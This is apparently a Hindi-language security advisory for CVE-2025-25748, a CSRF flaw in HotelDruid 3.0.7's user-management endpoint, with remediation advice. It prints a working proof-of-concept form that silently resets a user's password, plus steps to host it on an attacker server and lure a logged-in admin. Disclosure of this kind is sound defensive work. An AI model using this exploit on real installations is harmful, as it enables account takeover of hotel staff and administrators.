
HotelDruid 3.0.7 में क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता (CVE-2025-25748)
HotelDruid 3.0.7 में gestione_utenti.php एंडपॉइंट पर एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता हमलावरों को प्रमाणित उपयोगकर्ताओं की ओर से अनधिकृत कार्य (जैसे, उपयोगकर्ता पासवर्ड संशोधित करना) करने की अनुमति देती है, जो ऑरिजिन या रेफ़रर सत्यापन की कमी और CSRF टोकन की अनुपस्थिति का शोषण करती है।
यह भेद्यता सभी उपयोगकर्ता खातों — जिसमें प्रशासनिक खाते भी शामिल हैं — को उपयोगकर्ता की सहमति के बिना अनधिकृत परिवर्तनों के लिए उजागर करती है।
निम्नलिखित दुर्भावनापूर्ण फ़ॉर्म दर्शाता है कि कैसे एक हमलावर लॉग-इन प्रशासक को उपयोगकर्ता आईडी 2 का पासवर्ड maliciouspassword में बदलने के लिए मजबूर कर सकता है:
<form method="POST" action="http://localhost/hoteldruid/gestione_utenti.php"> <input type="hidden" name="anno" value="2025"> <input type="hidden" name="id_sessione" value="20250118062407or6tODG42f79QvMA2429"> <input type="hidden" name="modifica_pass" value="SI"> <input type="hidden" name="id_utente_pass" value="2"> <input type="hidden" name="prima_pass" value="maliciouspassword"> <input type="hidden" name="seconda_pass" value="maliciouspassword"> <button type="submit">Submit</button></form>
उपरोक्त कोड को csrf_attack.html के रूप में सेव करें।
इसे Python का उपयोग करके (हमलावर-नियंत्रित सर्वर) सर्व करें:
python3 -m http.server 8080
पीड़ित को यहाँ निर्देशित करें:
http://<attacker-ip>:8080/csrf_attack.html
एक बार सबमिट होने पर, फ़ॉर्म पीड़ित के सक्रिय सत्र का उपयोग करके होटलड्रूइड को अनुरोध भेजता है, उपयोगकर्ता आईडी 2 का पासवर्ड बदलकर maliciouspassword कर देता है।
HotelDruid होटल और छुट्टी किराये के लिए व्यापक रूप से उपयोग की जाने वाली ओपन-सोर्स संपत्ति प्रबंधन प्रणाली है। उपयोगकर्ता प्रबंधन के लिए प्रशासनिक नियंत्रण वाली बहु-उपयोगकर्ता प्रणाली होने के नाते, यह सुनिश्चित करना कि केवल अधिकृत उपयोगकर्ता ही खाता क्रेडेंशियल्स को संशोधित कर सकें, समग्र सिस्टम सुरक्षा के लिए महत्वपूर्ण है।
CSRF भेद्यताएँ किसी सर्वर द्वारा उपयोगकर्ता के ब्राउज़र सत्र पर रखे गए विश्वास का शोषण करती हैं। यदि कोई पीड़ित लॉग इन है और किसी दुर्भावनापूर्ण पृष्ठ पर जाता है, तो पृष्ठ पीड़ित के सक्रिय सत्र का उपयोग करके चुपचाप असुरक्षित एप्लिकेशन को अनधिकृत अनुरोध सबमिट कर सकता है। HotelDruid में, महत्वपूर्ण कार्यों — जैसे उपयोगकर्ता पासवर्ड बदलना — पर CSRF रक्षा की कमी हमलावरों को उपयोगकर्ता के किसी भी इंटरैक्शन के बिना (केवल एक दुर्भावनापूर्ण लिंक पर जाने से) खातों से पूरी तरह समझौता करने की अनुमति देती है।
gestione_utenti.phpmodifica_passid_utente_passprima_passseconda_passOrigin या Referer हेडर का कोई सत्यापन नहीं किया जाता है।gestione_utenti.php को लक्षित करते हुए पूर्व-भरे हुए छिपे हुए फ़ील्ड के साथ एक दुर्भावनापूर्ण HTML फ़ॉर्म तैयार करता है।Referer और Origin हेडर को मान्य करें कि अनुरोध विश्वसनीय उत्पत्ति से आते हैं।id_sessione) पास करने से बचें।